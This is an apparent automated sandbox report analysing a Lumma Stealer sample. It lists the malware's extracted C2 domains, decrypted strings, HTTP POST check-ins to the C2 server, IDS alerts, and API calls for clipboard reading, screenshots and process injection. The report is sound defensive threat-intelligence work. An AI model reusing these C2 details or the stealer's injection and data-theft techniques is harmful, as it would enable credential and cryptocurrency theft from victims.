Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1521592
MD5:	447de2327dc8ecd4830023a7d6c8ed64
SHA1:	5728f8c965ac1e71d373feedafdfd5b4528dd8ef
SHA256:	4f05a7585561eb31272758ecf586e5dcbe1b1064a4f59f9e1189b5a6dbabf90b
Tags:	exeLummaStealeruser-jstrosch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 447DE2327DC8ECD4830023A7D6C8ED64)

BitLockerToGo.exe (PID: 7500 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["ghostreedmnu.shop", "gutterydhowi.shop", "drawzhotdog.shop", "vozmeatillu.shop", "offensivedzvju.shop", "reinforcenh.shop", "stogeneratmns.shop", "fragnantbui.shop"], "Build id": "9mkWlh--RaUFPPPp"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1845237466.0000000001546000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000000.00000002.1845237466.0000000001680000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-29T00:54:40.171987+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.3	443	TCP
2024-09-29T00:54:41.176352+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49731	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-29T00:54:40.171987+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-29T00:54:41.176352+0200	2049812	1	A Network Trojan was detected	192.168.2.4	49731	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-29T00:54:39.954460+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	188.114.96.3	443	TCP
2024-09-29T00:54:40.756569+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	188.114.96.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-29T00:54:39.440733+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.4	63449	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.file.exe.17e0000.1.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["ghostreedmnu.shop", "gutterydhowi.shop", "drawzhotdog.shop", "vozmeatillu.shop", "offensivedzvju.shop", "reinforcenh.shop", "stogeneratmns.shop", "fragnantbui.shop"], "Build id": "9mkWlh--RaUFPPPp"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmp	String decryptor: 9mkWlh--RaUFPPPp

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000002.1845237466.000000000150C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000002.1845237466.000000000150C000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+24h]	1_2_006EF870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	1_2_006EF870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	1_2_006EF870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	1_2_006EF870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	1_2_006EF870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-1Ch]	1_2_006EE9C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [ebx], al	1_2_006F1DAE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi]	1_2_006F1DAE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_006F1DAE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	1_2_006FA040
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_00723010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ebp	1_2_006EA0C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ebp	1_2_006EA0C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edx], cl	1_2_00711167
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	1_2_00711167
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	1_2_00711167
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_00711167
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+44h]	1_2_006FD1CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 54CA534Eh	1_2_007272C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_0071A3F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	1_2_006F53E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	1_2_006F53E5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_007113A6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edx], al	1_2_007113A6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	1_2_00723460
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	1_2_006F447C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	1_2_0070D46E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	1_2_007274C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	1_2_0070D4B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_0070F530
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	1_2_00724590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	1_2_00708581
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], ax	1_2_00708581
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	1_2_00725643
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	1_2_006E5680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	1_2_006F0690
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	1_2_006F0690
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	1_2_00729700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	1_2_00729700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esp+14h], 12EEEC16h	1_2_0070E7F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	1_2_007078E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_007078E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	1_2_007078E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	1_2_00729890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	1_2_00729890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	1_2_00729A10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+000006A8h]	1_2_006FDACA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	1_2_00711AC3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	1_2_00711AC3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then xor eax, eax	1_2_0070ABF9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_006EDBF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp]	1_2_00723B90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	1_2_00723B90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	1_2_006F4C30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	1_2_00727D70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	1_2_0070FD10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	1_2_00720D00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [edi+eax+01h], 00000000h	1_2_0070CD08
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	1_2_0070CD08
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_006FFD80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp dword ptr [00730078h]	1_2_006FFD80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00705EF0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.4:63449 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49731 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=mR2JSNaRdDjE_8XNrKllJj88DnqyD4PDmAlrZswxjXQ-1727564080-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: ghostreedmnu.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: ghostreedmnu.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop

Source: file.exe	String found in binary or memory: https://api.midtrans.comGetUserDefaultLocaleNameinvalid
Source: file.exe	String found in binary or memory: https://api.sandbox.midtrans.comcrypto/aes:
Source: BitLockerToGo.exe, 00000001.00000002.1856895395.00000000007F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop/
Source: BitLockerToGo.exe, 00000001.00000002.1856895395.0000000000810000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1846685439.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop/api
Source: BitLockerToGo.exe, 00000001.00000003.1846756761.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1846685439.0000000000829000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1846663443.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000001.00000003.1846685439.0000000000829000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1846663443.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_00717DE0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

1_2_00717DE0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_00717DE0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

1_2_00717DE0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 1_2_00718247 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

1_2_00718247

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1845237466.0000000001546000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1845237466.0000000001680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006EF870	1_2_006EF870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E1000	1_2_006E1000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006EA0C0	1_2_006EA0C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006EE080	1_2_006EE080
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006F5081	1_2_006F5081
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00711167	1_2_00711167
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006EB150	1_2_006EB150
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0072A120	1_2_0072A120
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E9269	1_2_006E9269
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_007162B0	1_2_007162B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0071F2AC	1_2_0071F2AC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E1379	1_2_006E1379
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_007283F0	1_2_007283F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E13C1	1_2_006E13C1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E9442	1_2_006E9442
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0070D4B0	1_2_0070D4B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00716560	1_2_00716560
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E15E3	1_2_006E15E3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0070C5E3	1_2_0070C5E3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0070F5D0	1_2_0070F5D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00708581	1_2_00708581
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E3660	1_2_006E3660
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006F0690	1_2_006F0690
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00727870	1_2_00727870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_007178C0	1_2_007178C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E7900	1_2_006E7900
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006EC9D0	1_2_006EC9D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006FDACA	1_2_006FDACA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00717B70	1_2_00717B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E6B60	1_2_006E6B60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0070CB0F	1_2_0070CB0F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0070ABF9	1_2_0070ABF9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00723B90	1_2_00723B90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006EBC60	1_2_006EBC60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006EACC0	1_2_006EACC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00727D70	1_2_00727D70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00706D6F	1_2_00706D6F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006F2D20	1_2_006F2D20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_0070CD08	1_2_0070CD08
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_006E4DB0	1_2_006E4DB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 1_2_00729E50	1_2_00729E50
